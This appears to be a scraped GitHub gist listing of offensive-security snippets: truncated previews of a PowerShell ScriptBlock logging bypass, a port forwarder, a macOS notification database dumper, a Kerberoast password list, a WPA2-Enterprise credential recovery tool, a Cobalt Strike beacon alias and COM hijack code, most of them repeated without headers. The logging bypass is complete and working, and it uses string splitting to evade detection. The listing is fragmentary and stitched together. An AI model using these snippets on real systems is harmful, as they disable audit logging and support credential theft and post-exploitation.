CaledoniaProject

## ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }

## portfwd.ps1
#.\portfwd.ps1 127.0.0.1 8080 192.168.1.100 80
# launchable by standard user

$mycode = @"
//based on : https://blog.brunogarcia.com/2012/10/simple-tcp-forwarder-in-c.html
using System;
using System.Net;
using System.Net.Sockets;


## macos-dumpNotificationDB.py
# https://www.patreon.com/posts/when-messages-18714633

import os
import sys
import sqlite3
import datetime
import platform
import tempfile
import Foundation

## kerberoast_pws.xz

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CaledoniaProject
                / kerberoast_pws.xz
            
            
              Last active
              November 14, 2018 05:11
                — forked from edermi/kerberoast_pws.xz
            
              
                edermi Kerberoast PW list (XZ format)
              
          
      This file has been truncated, but you can view the full file.
    

            View raw
        
    
## doh_test.sh
#!/bin/bash
printf "===START dns.google.com===\n"
curl -k -H "accept: application/dns-json" "https://dns.google.com/resolve?name=example.com&type=AAAA"
printf "\n===END dns.google.com===\n"
printf "===START cloudflare-dns.com===\n"
curl -k -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA"
printf "\n===END cloudflare-dns.com===\n"
printf "===START 1.1.1.1===\n"
curl -k -H "accept: application/dns-json" "https://1.1.1.1/dns-query?name=example.com&type=AAAA"
printf "\n===END 1.1.1.1===\n"

## Get-WlanEnterprisePassword.ps1
// Original post
// https://0x00-0x00.github.io/research/2018/11/06/Recovering-Plaintext-Domain-Credentials-From-WPA2-Enterprise-on-a-compromised-host.html

function Get-String
{
    Param(
        [Parameter(Mandatory = $true, Position = 0)]
        [byte[]]$InputStream
    )
    [byte[]]$Output = @();

## sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";

beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");

alias sharpgen{
	$executionId  = "sharpgen_" . int(rand() * 100000);
	$temporaryCsharp =  $temppath . $executionId . ".cs";
	$executableFilename = $temppath . $executionId . ".exe";

## abandonedInprocServer32.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;

namespace ComAbandonment
{
    public class ComAbandonment
    {

## windows_hardening.cmd
::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"

## hyperdetect.c
//this requires being able to run at kernel mode and assumes you're using MSVC
//this also uses an unnamed structure for cr0_t, which is a nonstandard extension of the C language


//data structure for cr0
typedef union _cr0_t
{
	struct
	{
		uint64_t protection_enable : 1;
	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}
	#.\portfwd.ps1 127.0.0.1 8080 192.168.1.100 80
	# launchable by standard user

	$mycode = @"
	//based on : https://blog.brunogarcia.com/2012/10/simple-tcp-forwarder-in-c.html
	using System;
	using System.Net;
	using System.Net.Sockets;
	# https://www.patreon.com/posts/when-messages-18714633

	import os
	import sys
	import sqlite3
	import datetime
	import platform
	import tempfile
	import Foundation
	#!/bin/bash
	printf "===START dns.google.com===\n"
	curl -k -H "accept: application/dns-json" "https://dns.google.com/resolve?name=example.com&type=AAAA"
	printf "\n===END dns.google.com===\n"
	printf "===START cloudflare-dns.com===\n"
	curl -k -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA"
	printf "\n===END cloudflare-dns.com===\n"
	printf "===START 1.1.1.1===\n"
	curl -k -H "accept: application/dns-json" "https://1.1.1.1/dns-query?name=example.com&type=AAAA"
	printf "\n===END 1.1.1.1===\n"
	// Original post
	// https://0x00-0x00.github.io/research/2018/11/06/Recovering-Plaintext-Domain-Credentials-From-WPA2-Enterprise-on-a-compromised-host.html

	function Get-String
	{
	Param(
	[Parameter(Mandatory = $true, Position = 0)]
	[byte[]]$InputStream
	)
	[byte[]]$Output = @();
	$dotnetpath = "/usr/local/share/dotnet/dotnet";
	$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
	$temppath = "/tmp/";

	beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");

	alias sharpgen{
	$executionId = "sharpgen_" . int(rand() * 100000);
	$temporaryCsharp = $temppath . $executionId . ".cs";
	$executableFilename = $temppath . $executionId . ".exe";
	using System;
	using System.Collections.Generic;
	using System.IO;
	using System.Linq;
	using System.Management;

	namespace ComAbandonment
	{
	public class ComAbandonment
	{
	::
	::#######################################################################
	::
	:: Change file associations to protect against common ransomware attacks
	:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
	:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :)
	:: ---------------------
	ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
	ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
	ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
	//this requires being able to run at kernel mode and assumes you're using MSVC
	//this also uses an unnamed structure for cr0_t, which is a nonstandard extension of the C language


	//data structure for cr0
	typedef union _cr0_t
	{
	struct
	{
	uint64_t protection_enable : 1;